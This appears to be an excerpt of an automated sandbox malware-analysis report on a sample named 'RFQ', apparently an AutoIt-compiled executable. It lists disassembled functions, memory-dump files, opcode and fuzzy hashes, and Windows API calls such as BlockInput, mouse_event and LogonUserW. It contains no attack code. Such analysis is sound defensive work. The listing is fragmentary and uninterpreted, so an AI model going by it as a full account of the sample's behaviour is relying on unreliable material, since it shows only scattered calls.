                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: dc7411eb647c5cf92c9d7d40f14bda9f0eb7c93d11e797306a80e3a438ff06b8
                                                                                                                                                    • Instruction ID: e138503e00a829ffd53f25d8206902660410c8039fe13b0b5774f1dff1221d3d
                                                                                                                                                    • Opcode Fuzzy Hash: dc7411eb647c5cf92c9d7d40f14bda9f0eb7c93d11e797306a80e3a438ff06b8
                                                                                                                                                    • Instruction Fuzzy Hash: 6BB09231044608EBDB102BA1EC0DF587FA8EB09652F048120F60D46062AB7758108B9A
                                                                                                                                                    Function 0075D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 30ce6be3dd0d279d649fbc562b8bf624709750e4ed43ae5cd84a312423100e04
                                                                                                                                                    • Instruction ID: c409e58276e984ebfbb280842b8bbbd53801197acedb06d54700ae4c4e58cf88
                                                                                                                                                    • Opcode Fuzzy Hash: 30ce6be3dd0d279d649fbc562b8bf624709750e4ed43ae5cd84a312423100e04
                                                                                                                                                    • Instruction Fuzzy Hash: B132F121D29F014DD7339634C862326A388EFB73D5F15D72BE81AB5AA6EB6CD8834104
                                                                                                                                                    Function 007396C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __itow__swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 674341424-0
                                                                                                                                                    • Opcode ID: 03045d514b8d997f6465056c55fa1abd287197374fc4af990d31cce5562bb70b
                                                                                                                                                    • Instruction ID: c64c15f6b62398f6c3162fb7c18e2d1906cd5f8b6fd4c7519133e1e6ecd7fb7a
                                                                                                                                                    • Opcode Fuzzy Hash: 03045d514b8d997f6465056c55fa1abd287197374fc4af990d31cce5562bb70b
                                                                                                                                                    • Instruction Fuzzy Hash: C5229A71508300EFE725DF14C894B6BB7E4BF84310F104A1DF99A97292DBB9E945CB92
                                                                                                                                                    Function 0076038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a618e1103b13d2aa7287563f712a4e02140fd1b26930e0f4aec5eb4ad589878b
                                                                                                                                                    • Instruction ID: 201706148fd700e260f9862b6e13056fad4c751b94671521655ff194b320c410
                                                                                                                                                    • Opcode Fuzzy Hash: a618e1103b13d2aa7287563f712a4e02140fd1b26930e0f4aec5eb4ad589878b
                                                                                                                                                    • Instruction Fuzzy Hash: E8B1D020D2AF414DD72396398831336B75CAFBB2D5B91D71BFC1AB4D22EB2695C34184
                                                                                                                                                    Function 0077B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __time64.LIBCMT ref: 0077B6DF
                                                                                                                                                      • Part of subcall function 0075344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0077BDC3,00000000,?,?,?,?,0077BF70,00000000,?), ref: 00753453
                                                                                                                                                      • Part of subcall function 0075344A: __aulldiv.LIBCMT ref: 00753473
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2893107130-0
                                                                                                                                                    • Opcode ID: 97072997099527196e1ef43183820178682214fc3fc6ebd27439c7eff6a85c79
                                                                                                                                                    • Instruction ID: 41d90e06238ca7927a9229c7fb58a54d7f977b8fd6a453eb9be2ee080ee4f9e9
                                                                                                                                                    • Opcode Fuzzy Hash: 97072997099527196e1ef43183820178682214fc3fc6ebd27439c7eff6a85c79
                                                                                                                                                    • Instruction Fuzzy Hash: 72216072634510CBC729CF28C881BA2B7E1EB95360B248E6DE4E5CF280CB78A905DB54
                                                                                                                                                    Function 00786AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • BlockInput.USER32(00000001), ref: 00786ACA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                    • Opcode ID: 3b02002e3dbf5f8ef0b2ec0435508bc3b831f61b635e185e0bfa3ea6418a5995
                                                                                                                                                    • Instruction ID: 4f31cc131ae1c96baf011651b1039700e2589db87a2d3f2e96577e1fc719262d
                                                                                                                                                    • Opcode Fuzzy Hash: 3b02002e3dbf5f8ef0b2ec0435508bc3b831f61b635e185e0bfa3ea6418a5995
                                                                                                                                                    • Instruction Fuzzy Hash: 54E04835240204AFD710EF59D404E56B7ECAF74761F04C416F945D7351DAB8FC048BA1
                                                                                                                                                    Function 007774E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0077750A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: mouse_event
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2434400541-0
                                                                                                                                                    • Opcode ID: 30c85a40da03930cd784a584640ec2e3ed28a9b0235e609b5770d396bef4fd93
                                                                                                                                                    • Instruction ID: 7f36f1e4d68c51c0f77e49d7c782d47a76615305429155dc3c5b84af0dc075bf
                                                                                                                                                    • Opcode Fuzzy Hash: 30c85a40da03930cd784a584640ec2e3ed28a9b0235e609b5770d396bef4fd93
                                                                                                                                                    • Instruction Fuzzy Hash: ACD06CA416C64569EC2D07249C1FFB61A08A3007C2FD8C699B60AA90C0F8AC6D11E035
                                                                                                                                                    Function 0076B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0076AD3E), ref: 0076B124
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LogonUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1244722697-0
                                                                                                                                                    • Opcode ID: 4a65240aeda771fb3826e2f81997f8c3204860ea028512e1ed3fbc1fb6c031c5
                                                                                                                                                    • Instruction ID: 4745bd7c9d16483e738f035f62acdde27f3febe34a706017b06f3b14a38d0693
                                                                                                                                                    • Opcode Fuzzy Hash: 4a65240aeda771fb3826e2f81997f8c3204860ea028512e1ed3fbc1fb6c031c5
                                                                                                                                                    • Instruction Fuzzy Hash: A4D05E321A460EAEDF025FA4DC02EAE3F6AEB04700F408110FA11C50A0C675D931AB50
                                                                                                                                                    Function 007AB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: NameUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                                    • Opcode ID: 03110590200dc59b250d0cc75901f5da587223b3a7fad6a388d2ec1b129ace9e
                                                                                                                                                    • Instruction ID: 1b414138ef7b400f897c28f43cd3dec10e71ae28ed06175252214357b3c4c98d
                                                                                                                                                    • Opcode Fuzzy Hash: 03110590200dc59b250d0cc75901f5da587223b3a7fad6a388d2ec1b129ace9e
                                                                                                                                                    • Instruction Fuzzy Hash: CEC04CB1400109DFD751DFC0C944EEEB7BCAB04301F105191A105F1110E7749B459B76
                                                                                                                                                    Function 00758189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0075818F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: 04167230a338e775b172117ec652471ecdbedf5f226ed3d8878a45c039d2b227
                                                                                                                                                    • Instruction ID: 9a8b62a1d2009c6fed378cb14bb3d9e3a63a44d0a7a4e14df64e7bc182d5c1ad
                                                                                                                                                    • Opcode Fuzzy Hash: 04167230a338e775b172117ec652471ecdbedf5f226ed3d8878a45c039d2b227
                                                                                                                                                    • Instruction Fuzzy Hash: 45A0113000020CEB8F002B82EC088883FACEA002A0B008020F80C02022AB23A8208A8A
                                                                                                                                                    Function 007393F0 Relevance: .5, Instructions: 531COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a27d91ae07691b23c971030542d259f56bbe45b6c11d26d07c58f5c003ab3fef
                                                                                                                                                    • Instruction ID: 8fae920d036ffd5de02fe14ee90fbe6bee80bc0b377bee65241c0e8b1dfc70d4
                                                                                                                                                    • Opcode Fuzzy Hash: a27d91ae07691b23c971030542d259f56bbe45b6c11d26d07c58f5c003ab3fef
                                                                                                                                                    • Instruction Fuzzy Hash: 42127170A01209EFEF04DFA8D985AAEB7F5FF48300F108569E506E7252EB79AD11CB54
                                                                                                                                                    Function 0073E3E3 Relevance: .5, Instructions: 521COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 56dfa5f9323d2ae67b68d08c0855a6641126b3bec8154b0a62175622f77b0ae8
                                                                                                                                                    • Instruction ID: fdbbd5494183c5141f84a4e11e24708ef54a82f7f961be7c355641d9a28a9ccc
                                                                                                                                                    • Opcode Fuzzy Hash: 56dfa5f9323d2ae67b68d08c0855a6641126b3bec8154b0a62175622f77b0ae8
                                                                                                                                                    • Instruction Fuzzy Hash: E912AF71A04205DFEB24DF58C485BBAB7B0FF58304F14C169E94A9B392E739AD81CB91
                                                                                                                                                    Function 0073AF50 Relevance: .5, Instructions: 514COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3728558374-0
                                                                                                                                                    • Opcode ID: 15145104e9c54eb47cf68ff3bc5c7df4bef9abcf87fe21037d372fb289178e2f
                                                                                                                                                    • Instruction ID: 128b5f79e0a12cb51cc341da53994e2fd090a136f571feaa169ea4994924c3f8
                                                                                                                                                    • Opcode Fuzzy Hash: 15145104e9c54eb47cf68ff3bc5c7df4bef9abcf87fe21037d372fb289178e2f
                                                                                                                                                    • Instruction Fuzzy Hash: 5602B4B0A00109DFDF04DF68D995AAEB7B5FF49300F10C069E906DB256EB39DA15CB91
                                                                                                                                                    Function 007502A4 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                    • Instruction ID: 6c13bb457e7090af688213a920d064319cc5c38d41e886855cf2e6d2d1e686d7
                                                                                                                                                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                    • Instruction Fuzzy Hash: D4C1A6322051A30AEF2D4639C43457EFAA15EA27B331A076DD8B3CB5D5EF68C528D660
                                                                                                                                                    Function 007506D9 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                    • Instruction ID: 63fa60c230b169688770aa7a71c39aad72fb72bd9fbda2e2a5bf1d71f6af411d
                                                                                                                                                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                    • Instruction Fuzzy Hash: 38C1C5332051A309EF2D4639C43457EBBA15EA2BB331A076DD8B3CB4D5EF68D528D660
                                                                                                                                                    Function 0074FA57 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                    • Instruction ID: a472e69e064cbf0ba2ccba581e42742de0c238b408c1fab1d79f8dee2d7ec8d8
                                                                                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                    • Instruction Fuzzy Hash: D7C1A5322090A309EF2D4639C47453EFBA15EA2BB631A077DD8B3CB5D5EF28C564D620
                                                                                                                                                    Function 0078A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0078A2FE
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0078A310
                                                                                                                                                    • DestroyWindow.USER32 ref: 0078A31E
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0078A338
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0078A33F
                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0078A480
                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0078A490
                                                                                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A4D8
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0078A4E4
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0078A51E
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A540
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A553
